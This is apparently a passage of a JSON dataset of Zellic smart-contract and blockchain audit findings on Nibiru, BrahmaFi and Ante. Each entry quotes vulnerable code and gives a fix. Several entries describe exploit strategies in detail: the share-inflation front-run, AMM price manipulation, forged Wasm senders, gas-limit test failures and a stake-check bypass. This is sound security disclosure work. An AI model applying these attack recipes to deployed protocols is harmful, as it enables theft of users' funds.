risk.", + "html_url": "https://github.com/Zellic/publications/blob/master/SPL Token - Zellic Audit Report.pdf" + }, + { + "title": "5.1 Margin ratio not checked when removing collateral", + "labels": [ + "Zellic" + ], + "body": " Target: x/perp/v2/keeper/margin.go Category: Coding Mistakes Likelihood: High Severity: Critical Impact: Critical When removing margin from a position using RemoveMargin, there is a check to ensure that there is enough free collateral: func (k Keeper) RemoveMargin( ctx sdk.Context, pair asset.Pair, traderAddr sdk.AccAddress, marginToRemove sdk.Coin, ) (res *v2types.MsgRemoveMarginResponse, err error) { // fetch objects from state market, err := k.Markets.Get(ctx, pair) if err != nil { return nil, fmt.Errorf(\"%w: %s\", types.ErrPairNotFound, pair) } amm, err := k.AMMs.Get(ctx, pair) if err != nil { return nil, fmt.Errorf(\"%w: %s\", types.ErrPairNotFound, pair) } if marginToRemove.Denom != amm.Pair.QuoteDenom() { return nil, fmt.Errorf(\"invalid margin denom: %s\", marginToRemove.Denom) } position, err := k.Positions.Get(ctx, collections.Join(pair, traderAddr)) if err != 
nil { return nil, err } // ensure we have enough free collateral spotNotional, err := PositionNotionalSpot(amm, position) if err != nil { return nil, err } twapNotional, err := k.PositionNotionalTWAP(ctx, position, market.TwapLookbackWindow) if err != nil { return nil, err } minPositionNotional := sdk.MinDec(spotNotional, twapNotional) // account for funding payment fundingPayment := FundingPayment(position, market.LatestCumulativePremiumFraction) remainingMargin := position.Margin.Sub(fundingPayment) // account for negative PnL unrealizedPnl := UnrealizedPnl(position, minPositionNotional) if unrealizedPnl.IsNegative() { remainingMargin = remainingMargin.Add(unrealizedPnl) } if remainingMargin.LT(marginToRemove.Amount.ToDec()) { return nil, types.ErrFailedRemoveMarginCanCauseBadDebt.Wrapf( \"not enough free collateral to remove margin; remainingMargin %s, marginToRemove %s\", remainingMargin, marginToRemove, ) } if err = k.Withdraw(ctx, market, traderAddr, marginToRemove.Amount); err != nil { return nil, err } The issue is that there is no check to ensure that the new margin ratio of the position is valid and that it is not underwater. This allows someone to open a new position and then immediately remove 99.99% of the margin, effectively allowing them to take on infinite leverage. There should be a check on the margin ratio, similar to afterPositionUpdate, to ensure that it is not too low: var preferredPositionNotional sdk.Dec if positionResp.Position.Size_.IsPositive() { preferredPositionNotional = sdk.MaxDec(spotNotional, twapNotional) } else { preferredPositionNotional = sdk.MinDec(spotNotional, twapNotional) } marginRatio := MarginRatio(*positionResp.Position, preferredPositionNotional, market.LatestCumulativePremiumFraction) if marginRatio.LT(market.MaintenanceMarginRatio) { return v2types.ErrMarginRatioTooLow } This issue has been acknowledged by Nibiru, and a fix was implemented in commit ffad80c2.", + "html_url": "https://github.com/Zellic/publications/blob/master/Nibiru - Zellic Audit Report.pdf" + }, + { + "title": "5.2 AMM price manipulation using openReversePosition", + "labels": [ + "Zellic" + ], + "body": " Target: x/perp/v2/keeper Category: Coding Mistakes Likelihood: High Severity: Critical Impact: Critical The Nibiru perp module allows users to open reverse positions to decrease the margin, effectively shrinking the position size. A user can open a buy position and then immediately open a reverse position of the same size. Since currentPositionNotional is fractionally larger than notionalToDecreaseBy, it is possible to enter the decreasePosition flow as follows: if currentPositionNotional.GT(notionalToDecreaseBy) { // position reduction return k.decreasePosition( ctx, market, amm, currentPosition, notionalToDecreaseBy, baseAmtLimit, /* skipFluctuationLimitCheck */ false, This leaves the position with a zero size. Further, in afterPositionUpdate, the position is not saved due to the following check: func (k Keeper) afterPositionUpdate( ctx sdk.Context, market v2types.Market, amm v2types.AMM, traderAddr sdk.AccAddress, positionResp v2types.PositionResp, ) (err error) { [...] if !positionResp.Position.Size_.IsZero() { k.Positions.Insert(ctx, collections.Join(market.Pair, traderAddr), *positionResp.Position) } However, the AMM is still updated in decreasePosition as though the position was saved. 
func (k Keeper) decreasePosition( ctx sdk.Context, market v2types.Market, amm v2types.AMM, currentPosition v2types.Position, decreasedNotional sdk.Dec, baseAmtLimit sdk.Dec, skipFluctuationLimitCheck bool, ) (updatedAMM *v2types.AMM, positionResp *v2types.PositionResp, err error) { [...] updatedAMM, baseAssetDeltaAbs, err := k.SwapQuoteAsset( ctx, market, amm, dir, decreasedNotional, baseAmtLimit, ) An attacker could repeatedly open and close positions to manipulate the AMM price. They could then liquidate strong positions to make a profit. It appears that the afterPositionUpdate function does not update a position with size zero because it assumes that it has already been deleted \u2014 for example, in closePositionEntirely: positionResp.ExchangedNotionalValue = exchangedNotionalValue positionResp.Position = &v2types.Position{ TraderAddress: currentPosition.TraderAddress, Pair: currentPosition.Pair, Size_: sdk.ZeroDec(), Margin: sdk.ZeroDec(), OpenNotional: sdk.ZeroDec(), LatestCumulativePremiumFraction: market.LatestCumulativePremiumFraction, LastUpdatedBlockNumber: ctx.BlockHeight(), } err = k.Positions.Delete(ctx, collections.Join(currentPosition.Pair, trader)) Instead, a flag could be added to the PositionResp type to avoid updating a position after it has been deleted. This issue has been acknowledged by Nibiru, and fixes were implemented in the following commits: ffad80c2 d47861fd", + "html_url": "https://github.com/Zellic/publications/blob/master/Nibiru - Zellic Audit Report.pdf" + }, + { + "title": "5.3 The sender is not checked for Wasm messages", + "labels": [ + "Zellic" + ], + "body": " Target: x/wasm/binding/exec.go Category: Coding Mistakes Likelihood: High Severity: Critical Impact: Critical The CosmosWasm module has been enabled to allow developers to deploy smart contracts on Nibiru. To allow these contracts to interact with the chain, a custom executor has been written that will intercept and execute the appropriate custom calls: type OpenPosition struct { Sender string `json:\"sender\"` Pair string `json:\"pair\"` IsLong bool `json:\"is_long\"` QuoteAmount sdk.Int `json:\"quote_amount\"` Leverage sdk.Dec `json:\"leverage\"` BaseAmountLimit sdk.Int `json:\"base_amount_limit\"` } // DispatchMsg encodes the wasmVM message and dispatches it. func (messenger *CustomWasmExecutor) DispatchMsg( ctx sdk.Context, contractAddr sdk.AccAddress, contractIBCPortID string, wasmMsg wasmvmtypes.CosmosMsg, ) (events []sdk.Event, data [][]byte, err error) { // If the \"Custom\" field is set, we handle a BindingMsg. if wasmMsg.Custom != nil { var contractExecuteMsg BindingExecuteMsgWrapper if err := json.Unmarshal(wasmMsg.Custom, &contractExecuteMsg); err != nil { return events, data, sdkerrors.Wrapf(err, \"wasmMsg: %s\", wasmMsg.Custom) } switch { // Perp module case contractExecuteMsg.ExecuteMsg.OpenPosition != nil: cwMsg := contractExecuteMsg.ExecuteMsg.OpenPosition _, err = messenger.Perp.OpenPosition(cwMsg, ctx) return events, data, err ... These can then be called from a Cosmos contract: /// NibiruExecuteMsg is an override of CosmosMsg::Custom. Using this msg /// wrapper for the ExecuteMsg handlers show that their return values are valid /// instances of CosmosMsg::Custom in a type-safe manner. It also shows how /// ExecuteMsg can be extended in the contract. 
#[cw_serde] #[cw_custom] pub struct NibiruExecuteMsg { pub route: NibiruRoute, pub msg: ExecuteMsg, } pub fn open_position( sender: String, pair: String, is_long: bool, quote_amount: Uint128, leverage: Decimal, base_amount_limit: Uint128, ) -> CosmosMsg { NibiruExecuteMsg { route: NibiruRoute::Perp, msg: ExecuteMsg::OpenPosition { sender, pair, is_long, quote_amount, leverage, base_amount_limit, }, } .into() } The issue is that there is no validation on the value of sender; it can be set to an arbitrary account and end up being sent straight to the message handler: func (exec *ExecutorPerp) OpenPosition( cwMsg *cw_struct.OpenPosition, ctx sdk.Context, ) ( sdkResp *perpv2types.MsgOpenPositionResponse, err error, ) { if cwMsg == nil { return sdkResp, wasmvmtypes.InvalidRequest{Err: \"null open position msg\"} } pair, err := asset.TryNewPair(cwMsg.Pair) if err != nil { return sdkResp, err } var side perpv2types.Direction if cwMsg.IsLong { side = perpv2types.Direction_LONG } else { side = perpv2types.Direction_SHORT } sdkMsg := &perpv2types.MsgOpenPosition{ Sender: cwMsg.Sender, Pair: pair, Side: side, QuoteAssetAmount: cwMsg.QuoteAmount, Leverage: cwMsg.Leverage, BaseAssetAmountLimit: cwMsg.BaseAmountLimit, } goCtx := sdk.WrapSDKContext(ctx) return exec.MsgServer().OpenPosition(goCtx, sdkMsg) } This allows a CosmosWasm contract to execute the OpenPosition, ClosePosition, AddMargin, and RemoveMargin operations on behalf of any user. The sender should not be able to be arbitrarily set; it should be the address of the contract that is executing the message. If the sender needs to be configurable, only a whitelisted or trusted contract should be able to do it, and that contract should have the appropriate checks to ensure the sender is set to the correct value. This issue has been acknowledged by Nibiru, and fixes were implemented in the following commits: bb898ae9 75041c3d", + "html_url": "https://github.com/Zellic/publications/blob/master/Nibiru - Zellic Audit Report.pdf" + }, + { + "title": "5.4 Wasm bindings do not validate messages", + "labels": [ + "Zellic" + ], + "body": " Target: x/wasm/binding/exec.go Category: Coding Mistakes Likelihood: High Severity: Critical Impact: Critical It was found that the Wasm bindings use messages directly after they are unmarshalled, without calling ValidateBasic. The messages are directly passed to the handlers, and crucial checks are skipped. func (messenger *CustomWasmExecutor) DispatchMsg( ctx sdk.Context, contractAddr sdk.AccAddress, contractIBCPortID string, wasmMsg wasmvmtypes.CosmosMsg, ) (events []sdk.Event, data [][]byte, err error) { // If the \"Custom\" field is set, we handle a BindingMsg. if wasmMsg.Custom != nil { var contractExecuteMsg BindingExecuteMsgWrapper if err := json.Unmarshal(wasmMsg.Custom, &contractExecuteMsg); err != nil { return events, data, sdkerrors.Wrapf(err, \"wasmMsg: %s\", wasmMsg.Custom) } switch { // Perp module case contractExecuteMsg.ExecuteMsg.OpenPosition != nil: cwMsg := contractExecuteMsg.ExecuteMsg.OpenPosition _, err = messenger.Perp.OpenPosition(cwMsg, ctx) Any checks that the handlers rely on ValidateBasic for are skipped and can be exploited if the respective checks are not present in the handlers. The following are examples of messages that can be exploited: For one, ExecuteMsg.AddMargin does not check if the margin denom is the same as the pair denom. This could allow incorrect collateral to be used. 
Another is that ExecuteMsg.RemoveMargin does not check that the amount to remove is positive, allowing the margin of a position to be increased without transferring any funds from the user. The inflated margin could then be withdrawn to drain the VaultModuleAccount and PerpEFModuleAccount pools. After creating each sdkMsg, ValidateBasic() should be called before it is passed to the MsgServer in the executor. This issue has been acknowledged by Nibiru, and fixes were implemented in the following commits: ba58517e da51fdf0", + "html_url": "https://github.com/Zellic/publications/blob/master/Nibiru - Zellic Audit Report.pdf" + }, + { + "title": "5.5 Incorrect TWAP calculation", + "labels": [ + "Zellic" + ], + "body": " Target: x/oracle/keeper/keeper.go Category: Coding Mistakes Likelihood: High Severity: High Impact: High The oracle module uses calcTwap to compute the TWAP (time-weighted average price). Here, the maximum of snapshots[0].TimestampMs and ctx.BlockTime().UnixMilli() - twapLookBack is used as firstTimeStamp. func (k Keeper) calcTwap(ctx sdk.Context, snapshots []types.PriceSnapshot) (price sdk.Dec, err error) { [...] firstTimeStamp := ctx.BlockTime().UnixMilli() - twapLookBack cumulativePrice := sdk.ZeroDec() firstTimeStamp = math.MaxInt64(snapshots[0].TimestampMs, firstTimeStamp) [...] nextTimestampMs = snapshots[i+1].TimestampMs price := s.Price.MulInt64(nextTimestampMs - timestampStart) [...] } This is not sound, as it is possible for the price to be negative if timestampStart is greater than nextTimestampMs. If timestampStart is greater than nextTimestampMs, the resulting TWAP data will be incorrect. However, this is not an issue currently, since the caller of calcTwap only includes snapshots starting from ctx.BlockTime().UnixMilli() - twapLookBack. Ideally, firstTimeStamp should always just be equal to the timestamp of the first snapshot. This issue has been acknowledged by Nibiru, and a fix was implemented in commit 53487734.", + "html_url": "https://github.com/Zellic/publications/blob/master/Nibiru - Zellic Audit Report.pdf" + }, + { + "title": "5.6 Panic in EndBlock hooks will halt the chain", + "labels": [ + "Zellic" + ], + "body": " Target: x/inflation, x/oracle Category: Coding Mistakes Likelihood: High Severity: High Impact: High When executing a transaction, Cosmos automatically handles any panics that may occur with the default recovery middleware (see runtx_middleware), but this is not the case for anything that runs within an EndBlock or BeginBlock hook. In these cases, it is vital that there are no panics and that all errors are handled correctly; otherwise, it will result in a chain halt as all the validators will panic and crash. The following locations are all reachable from an EndBlock or BeginBlock (AfterEpochEnd is called from a BeginBlock): x/inflation/keeper/hooks.go#L64-L64 x/oracle/keeper/slash.go#L52-L52 x/oracle/keeper/update_exchange_rates.go#L80-L80 x/oracle/keeper/reward.go#L71-L71 x/oracle/keeper/reward.go#L60-L60 x/oracle/keeper/ballot.go#L69-L69 x/oracle/types/ballot.go#L111-L111 If any of these error conditions are met, there will be a chain halt as all the validators will crash. The panics should be replaced with the appropriate error handling for each case, either logging the error or failing gracefully. 
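As an illustration, such hooks can be routed through a recovery wrapper so that a panic is logged instead of crashing every validator. The following is a minimal sketch under stated assumptions (safeHook is a hypothetical helper, not Nibiru\u2019s actual code):
package sketch

import (
	sdk \"github.com/cosmos/cosmos-sdk/types\"
	\"github.com/tendermint/tendermint/libs/log\"
)

// safeHook runs fn and converts both panics and returned errors into log
// entries, so a BeginBlock/EndBlock hook can never halt the chain.
func safeHook(ctx sdk.Context, logger log.Logger, fn func(sdk.Context) error) {
	defer func() {
		if r := recover(); r != nil {
			logger.Error(\"recovered from panic in block hook\", \"panic\", r)
		}
	}()
	if err := fn(ctx); err != nil {
		logger.Error(\"block hook failed\", \"err\", err)
	}
}
Each of the listed call sites would then be invoked through the wrapper (or have its panic replaced by an equivalent logged error) rather than calling panic directly.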
This issue has been acknowledged by Nibiru, and fixes were implemented in the following commits: 73d9bfd4 85859f2b", + "html_url": "https://github.com/Zellic/publications/blob/master/Nibiru - Zellic Audit Report.pdf" + }, + { + "title": "5.7 The ReserveSnapshots are never updated", + "labels": [ + "Zellic" + ], + "body": " Target: x/perp/v2/module/abci.go Category: Coding Mistakes Likelihood: High Severity: High Impact: High The perp module has an EndBlocker, which is designed to create a snapshot of the AMM in order to calculate the TWAP prices: // EndBlocker Called every block to store a snapshot of the perpamm. func EndBlocker(ctx sdk.Context, k keeper.Keeper) []abci.ValidatorUpdate { for _, amm := range k.AMMs.Iterate(ctx, collections.Range[asset.Pair]{}).Values() { snapshot := types.ReserveSnapshot{ Amm: amm, TimestampMs: ctx.BlockTime().UnixMilli(), } k.ReserveSnapshots.Insert(ctx, collections.Join(amm.Pair, ctx.BlockTime()), snapshot) } return []abci.ValidatorUpdate{} } The issue is that the EndBlocker is not hooked up and is never called. The ReserveSnapshots are never updated, and so anything relying on them (such as CalcTwap) will be using whatever values were set during genesis. The EndBlocker should be called from the perp module\u2019s EndBlock: func (am AppModule) EndBlock(ctx sdk.Context, _ abci.RequestEndBlock) []abci.ValidatorUpdate { EndBlocker(ctx, am.keeper) return []abci.ValidatorUpdate{} } This issue has been acknowledged by Nibiru, and a fix was implemented in commit 7144cc96.", + "html_url": "https://github.com/Zellic/publications/blob/master/Nibiru - Zellic Audit Report.pdf" + }, + { + "title": "5.8 Distributing zero coins causes chain halt", + "labels": [ + "Zellic" + ], + "body": " Target: x/oracle/keeper/hooks.go Category: Coding Mistakes Likelihood: High Severity: High Impact: High The oracle module uses an AfterEpochEnd hook, which allocates rewards for validators. This hook is inside the BeginBlocker. func (h Hooks) AfterEpochEnd(ctx sdk.Context, epochIdentifier string, _ uint64) { [...] balances := h.bankKeeper.GetAllBalances(ctx, account.GetAddress()) for _, balance := range balances { validatorFees := balance.Amount.ToDec().Mul(params.ValidatorFeeRatio).TruncateInt() rest := balance.Amount.Sub(validatorFees) totalValidatorFees = append(totalValidatorFees, sdk.NewCoin(balance.Denom, validatorFees)) totalRest = append(totalRest, sdk.NewCoin(balance.Denom, rest)) } [...] err = h.k.AllocateRewards( ctx, perptypes.FeePoolModuleAccount, totalValidatorFees, 1, ) if err != nil { panic(err) } The issue here is that validatorFees could be zero for very small positions. This means AllocateRewards could be called with one or more coins with a zero amount. The AllocateRewards function in turn calls bankKeeper.SendCoinsFromModuleToModule, which will fail if any of the coins have a nonpositive amount. func (coins Coins) Validate() error { [...] if err := ValidateDenom(coins[0].Denom); err != nil { return err } if !coins[0].IsPositive() { return fmt.Errorf(\"coin %s amount is not positive\", coins[0]) } Since the AfterEpochEnd hook is inside the BeginBlocker, this will cause the chain to halt. If the final value of totalValidatorFees is not greater than zero, then the call to h.k.AllocateRewards should not be made. This issue has been acknowledged by Nibiru, and a fix was implemented in commit c430556a. 
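For illustration, a minimal sketch of that guard (allocateNonZeroFees is a hypothetical helper written against the snippet above, not the implemented fix) filters out zero-amount coins and skips the allocation entirely when nothing positive remains:
// allocateNonZeroFees drops zero-amount coins before calling
// AllocateRewards, so Coins.Validate never sees a non-positive amount
// inside the BeginBlocker.
func allocateNonZeroFees(ctx sdk.Context, h Hooks, totalValidatorFees sdk.Coins) error {
	nonZero := sdk.NewCoins() // NewCoins sorts and drops zero-amount coins
	for _, c := range totalValidatorFees {
		if c.Amount.IsPositive() {
			nonZero = nonZero.Add(c)
		}
	}
	if nonZero.IsZero() {
		return nil // nothing to distribute; skip the call instead of panicking
	}
	return h.k.AllocateRewards(ctx, perptypes.FeePoolModuleAccount, nonZero, 1)
}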
", + "html_url": "https://github.com/Zellic/publications/blob/master/Nibiru - Zellic Audit Report.pdf" + }, + { + "title": "5.9 Large rewardSpread due to miscalculation", + "labels": [ + "Zellic" + ], + "body": " Target: x/oracle/types/ballot.go Category: Coding Mistakes Likelihood: Medium Severity: High Impact: Medium The oracle module uses the rewardSpread to check if the price data from a validator is within an acceptable range of the chosen price. func Tally(ballots types.ExchangeRateBallots, rewardBand sdk.Dec, validatorPerformances types.ValidatorPerformances) sdk.Dec { sort.Sort(ballots) weightedMedian := ballots.WeightedMedianWithAssertion() standardDeviation := ballots.StandardDeviation(weightedMedian) rewardSpread := weightedMedian.Mul(rewardBand.QuoInt64(2)) if standardDeviation.GT(rewardSpread) { rewardSpread = standardDeviation sum := sdk.ZeroDec() for _, v := range pb { deviation := v.ExchangeRate.Sub(median) sum = sum.Add(deviation.Mul(deviation)) } The standard deviation for the ballots is used directly as the rewardSpread if it is greater than the calculated rewardSpread. if standardDeviation.GT(rewardSpread) { rewardSpread = standardDeviation The StandardDeviation function, however, does not ignore negative votes. This could allow a malicious validator to submit abstaining votes with very large negative values and increase the rewardSpread. Two malicious validators could collude to repeatedly submit prices outside the acceptable price band. They can do this without being slashed due to rewardSpread having a very high value. If eventually the attacker succeeds in publishing an invalid price, they could profit by liquidating strong positions through the perp module. Abstained votes should be ignored when calculating the standard deviation for the ballots. This issue has been acknowledged by Nibiru, and a fix was implemented in commit 908571f0.", + "html_url": "https://github.com/Zellic/publications/blob/master/Nibiru - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Deposits can be potentially frontrun and stolen", + "labels": [ + "Zellic" + ], + "body": " Target: Vault Category: Business Logic Likelihood: Medium Severity: High Impact: High The shares minted in deposit() are calculated as a ratio of totalVaultFunds() and totalSupply(). The totalVaultFunds() can be potentially inflated, reducing the amount of shares minted (even to 0). function deposit(uint256 amountIn, address receiver) ... shares = totalSupply() > 0 ? (totalSupply() * amountIn) / totalVaultFunds() : amountIn; IERC20(wantToken).safeTransferFrom(receiver, address(this), amountIn); _mint(receiver, shares); } ... function totalVaultFunds() public view returns (uint256) { return IERC20(wantToken).balanceOf(address(this)) + totalExecutorFunds(); } By transferring wantToken tokens directly, totalVaultFunds() would be inflated (because of balanceOf()), and as the division result is floored, there could be a case when it would essentially mint 0 shares, causing a loss for the depositing user. If an attacker controls all of the share supply before the deposit, they would be able to withdraw all the user-deposited tokens. Consider the following attack scenario: 1. The Vault contract is deployed. 2. The governance sets batcherOnlyDeposit to false. 3. The attacker deposits[1] X stakeable tokens and receives X LP tokens. 4. The victim tries to deposit Y stakeable tokens. 5. 
The attacker frontruns the victim\u2019s transaction and transfers[2] X * (Y - 1) + 1 stakeable tokens to the Vault contract. 6. The victim\u2019s transaction is executed, and the victim receives 0 LP tokens.[3] 7. The attacker redeems her LP tokens, effectively stealing Y stakeable tokens from the victim. The foregoing is just an example. Variations of the foregoing attack scenario are possible. The impact of this finding is mitigated by the fact that the default value of batcherOnlyDeposit is true, which allows the keeper of the Batcher contract to: 1) prevent the attacker from acquiring 100% of the total supply of LP tokens; 2) prevent the attacker from redeeming her LP tokens for stakeable tokens. Consider: adding an amountOutMin parameter to the deposit(uint256 amountIn, address receiver) function of the Vault contract; adding a require statement that ensures that the deposit() function never mints 0 or less than amountOutMin LP tokens. The issue has been acknowledged by Brahma and mitigated in commit 413b9cc. 1 By calling the deposit() function of the Vault contract. 2 By calling the transfer() function of the stakeable token contract. This doesn\u2019t increase the total supply of LP tokens. The attacker is always able to call transfer() to directly transfer stakeable tokens to the Vault contract, even when batcherOnlyDeposit is set to true. 3 The formula for calculating the number of LP tokens received: LPTokensReceived = Y * totalSupplyOfLPTokens / totalStakeableTokensInVault. Substitute totalSupplyOfLPTokens = X and totalStakeableTokensInVault = X + X * (Y - 1) + 1. The result: LPTokensReceived = Y * X / (X + X * (Y - 1) + 1) = Y * X / (X * Y + 1) = 0.", + "html_url": "https://github.com/Zellic/publications/blob/master/BrahmaFi - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Centralization risks", + "labels": [ + "Zellic" + ], + "body": " Target: Batcher, Vault, ConvexTradeExecutor, PerpTradeExecutor, Harvester, PerpPositionHandlerL2 Category: Code Maturity Likelihood: n/a Severity: High Impact: High The protocol is heavily centralized. This may be by design due to the nature of yield aggregators. The governance can call the sweep() function of the Batcher, Vault, ConvexTradeExecutor, PerpTradeExecutor and Harvester contracts, effectively draining the token balances of the aforementioned contracts. The strategist can call the sweep() function of the PerpPositionHandlerL2 contract, effectively draining the token balances of the aforementioned contract. The documentation states that 1-10% of the user-deposited funds stay within the vault as a buffer and only the yield harvested from Curve and Convex is used for trading on Perpetual Protocol. These invariants are not enforced in any way in the Vault contract itself. The keeper can freely move the user-deposited funds between the vault and its trade executors. It is therefore the responsibility of keepers to enforce the aforementioned invariants. Centralization carries heavy risks, most of which have been outlined in the section above. A compromised governance, strategist or keeper could potentially steal all user funds. Consider setting up multisig wallets for the governance, the strategist and the keeper. Consider enforcing, on the protocol level, the invariants outlined in the documentation. Consider following best security practices when handling the private keys of the externally-owned accounts. The issue has been acknowledged by the Brahma team. 
Further steps to secure private keys and the usage of a multisig address are being addressed.", + "html_url": "https://github.com/Zellic/publications/blob/master/BrahmaFi - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Unwanted deposits and withdrawals can be triggered on behalf of another user", + "labels": [ + "Zellic" + ], + "body": " Target: Vault Category: Business Logic Likelihood: Medium Severity: High Impact: High The deposit() and withdraw() functions of the Vault contract accept two arguments: function deposit(uint256 amountIn, address receiver) public override nonReentrant ensureFeesAreCollected returns (uint256 shares) { /// checks for only batcher deposit onlyBatcher(); ... } function withdraw(uint256 sharesIn, address receiver) public override nonReentrant ensureFeesAreCollected returns (uint256 amountOut) { /// checks for only batcher withdrawal onlyBatcher(); ... } Both of the functions call onlyBatcher() to check and enforce the validity of msg.sender: function onlyBatcher() internal view { if (batcherOnlyDeposit) { require(msg.sender == batcher, \"ONLY_BATCHER\"); } } Both of the functions perform no other checks of the validity of msg.sender. By default (batcherOnlyDeposit = true), only the Batcher contract can deposit and withdraw funds on behalf of the receiver. The governance can change batcherOnlyDeposit to false. When batcherOnlyDeposit = false, the deposit() and withdraw() functions perform no msg.sender validity checks whatsoever, allowing any third-party user to trigger deposits[4] and withdrawals[5] on behalf of any receiver. A third party can trigger unwanted deposits and withdrawals on behalf of another user. This can lead to user confusion, lost profits, and potentially even a loss of funds. Consider adding if (!batcherOnlyDeposit) { require(msg.sender == receiver); } checks to the deposit() and withdraw() functions. The issue has been fixed in commit 32d30c8. 4 Deposits only work if the receiver has approve()d enough stakeable tokens. 5 Withdrawals only work if the receiver owns enough of the vault LP tokens.", + "html_url": "https://github.com/Zellic/publications/blob/master/BrahmaFi - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Some emergency-only functions can be called outside of an emergency state", + "labels": [ + "Zellic" + ], + "body": " Target: Batcher, Vault, ConvexTradeExecutor, PerpTradeExecutor, Harvester, PerpPositionHandlerL2 Category: Business Logic Likelihood: High Severity: Medium Impact: Medium The project contains six contracts that implement a sweep() function: Batcher Vault ConvexTradeExecutor (derived from BaseTradeExecutor) PerpTradeExecutor (derived from BaseTradeExecutor) Harvester PerpPositionHandlerL2 The sweep() functions in Batcher, Vault, ConvexTradeExecutor and PerpTradeExecutor are documented as callable only in an emergency state. Only the sweep() function in Vault implements emergency state checks. The sweep() functions in all other contracts do not. The emergency-only sweep() functions in Batcher, ConvexTradeExecutor and PerpTradeExecutor can be called outside of an emergency state. The sweep() functions in Harvester and PerpPositionHandlerL2 can also be called outside of an emergency state, but they are not documented as callable only in an emergency state. Consider adding emergency state checks to the sweep() functions of the Batcher, ConvexTradeExecutor and PerpTradeExecutor contracts. 
Consider adding emergency state checks to the sweep() function of the Harvester contract and documenting it accordingly. Consider: 1) adding an emergency state variable to the PerpPositionHandlerL2 contract;[6] 2) adding emergency state checks to the sweep() function of the PerpPositionHandlerL2 contract; 3) documenting this accordingly. The issue has been acknowledged by the Brahma team. 6 This step is required because the PerpPositionHandlerL2 is deployed on top of Optimism, an L2 network, and therefore (and unlike all the other contracts) cannot access the emergency state variable of the Vault contract in a timely manner.", + "html_url": "https://github.com/Zellic/publications/blob/master/BrahmaFi - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Ability to force tests to fail with gas limit", + "labels": [ + "Zellic" + ], + "body": " Target: AntePool Category: Coding Mistakes Likelihood: Medium Severity: Critical Impact: Critical It is possible for attackers to force tests to fail by setting the gas limit to a very specific value where: it is low enough that the inner call to checkTestPasses runs out of gas, but it is high enough that the outer checkTest/checkTestNoRevert functions finish executing. This is possible because of a feature in Solidity where try/catch statements revert before the last 1/64th of the transaction gas limit is consumed (source): The caller always retains at least 1/64th of the gas in a call and thus even if the called contract goes out of gas, the caller still has some gas left. So, if 1/64th of the maximum gas value that causes the test to revert is enough to execute the remainder of checkTest, it is possible to force a test to fail. Zellic wrote a proof-of-concept exploit to verify the exploitability of this issue. An attacker could force certain pools to fail and claim their rewards. Note that as of the time of this writing, no community-written, deployed tests are vulnerable. It is not currently possible to directly detect an out-of-gas error in a try/catch. Zellic and Ante Labs determined that the best solution is to implement magic return values so that pools can distinguish between a \u201cfalse\u201d returned by an out-of-gas reversion and a test failure (indicated by returning false or manual reversion). Ante Labs acknowledged this finding and plans to implement a fix\u2014most likely using the magic return value method described in the section above. 
In the meantime, Ante Labs plans to provide analysis tools to community test writers to lower the likelihood of a vulnerable test being deployed. Note that no community-written, deployed tests are vulnerable as of the time of this writing.", + "html_url": "https://github.com/Zellic/publications/blob/master/Ante - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Number of challengers is constrained by block gas limit", + "labels": [ + "Zellic" + ], + "body": " Target: AntePool Category: Coding Mistakes Likelihood: Low Severity: High Impact: Critical An attacker can freeze funds for a low cost by causing the _calculateChallengerEligibility function to hit the block gas limit. Since the loop iterates over every challenger in storage, if enough challengers are registered, the checkTest function will not be callable when the test fails. Front-running bots may be able to claim the majority of rewards by exploiting the block gas limit issue using the following steps: 1. Upon detecting a failed check, depositing a large amount of capital as challenger. 2. Locking checkTest by registering many challengers. 3. Twelve blocks later, unlocking checkTest by removing them. 4. Calling checkTest to claim rewards and the 5% bounty. Stakers could prevent checkTest from running until their funds are unstaked after realizing a test is going to fail. An attacker could perform griefing attacks to prevent payouts from failed checks. Note that this vulnerability can be chained with the MIN_CHALLENGER_STAKE bypass vulnerability to significantly lower the attack cost. We determined that in practice, exploiting these two vulnerabilities together to lock funds would cost approximately $60,000 USD in block gas as of the time of this writing. An attack is especially likely if the profit of delaying checkTest exceeds the cost of the attack. We recommend dynamically calculating the MIN_CHALLENGER_STAKE so that it is economically impractical to perform this attack. For recommendations on mitigating the minimum challenger stake bypass vulnerability, see the finding in section 3.3. Ante Labs acknowledged this finding and implemented a fix in commit a9490290d23191d2bbcc2acfce5c901aed1bb5d2.", + "html_url": "https://github.com/Zellic/publications/blob/master/Ante - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Bypassable minimum challenger stake", + "labels": [ + "Zellic" + ], + "body": " Target: AntePool Category: Coding Mistakes Likelihood: High Severity: Low Impact: Low It is possible to bypass the following check in the stake function. This would allow malicious challengers to stake less than the minimum of MIN_CHALLENGER_STAKE (default 1e16, or 0.01 ether): require(amount >= MIN_CHALLENGER_STAKE, \"ANTE: Challenger must stake more than 0.01 ETH\"); To bypass the MIN_CHALLENGER_STAKE, challengers can 1. Call the stake function to stake MIN_CHALLENGER_STAKE 2. In the same transaction, call the unstake (internally _unstake) function to unstake MIN_CHALLENGER_STAKE - 1 Now, the challenger is still registered while only costing 1 base unit (0.00000001 ether) and block gas fees. Front-running bots could register a challenger on every test for a very low cost to steal the 5% bounty when a test fails. 
If challengers wish to withdraw enough challenger stake that their total staked amount becomes less than MIN_CHALLENGER_STAKE, require that all of their stake be removed: function _unstake( uint256 amount, bool isChallenger, PoolSideInfo storage side, UserInfo storage user ) internal { // Calculate how much the user has available to unstake, including the // effects of any previously accrued decay. // prevAmount = startAmount * decayMultiplier / startDecayMultiplier uint256 prevAmount = _storedBalance(user, side); if (prevAmount == amount) { user.startAmount = 0; user.startDecayMultiplier = 0; side.numUsers = side.numUsers.sub(1); // Remove from set of existing challengers if (isChallenger) challengers.remove(msg.sender); } else { require(amount <= prevAmount, \"ANTE: Withdraw request exceeds balance.\"); require(!isChallenger || prevAmount.sub(amount) > MIN_CHALLENGER_STAKE, \"ANTE: must withdraw at least MIN_CHALLENGER_STAKE\"); user.startAmount = prevAmount.sub(amount); // Reset the startDecayMultiplier for this user, since we've updated // the startAmount to include any already-accrued decay. user.startDecayMultiplier = side.decayMultiplier; } side.totalAmount = side.totalAmount.sub(amount); emit Unstake(msg.sender, amount, isChallenger); } For recommendations on mitigating the maximum challengers limit due to the block gas limit vulnerability, see the finding in section 3.2. Ante Labs acknowledged this finding and implemented a fix in commit 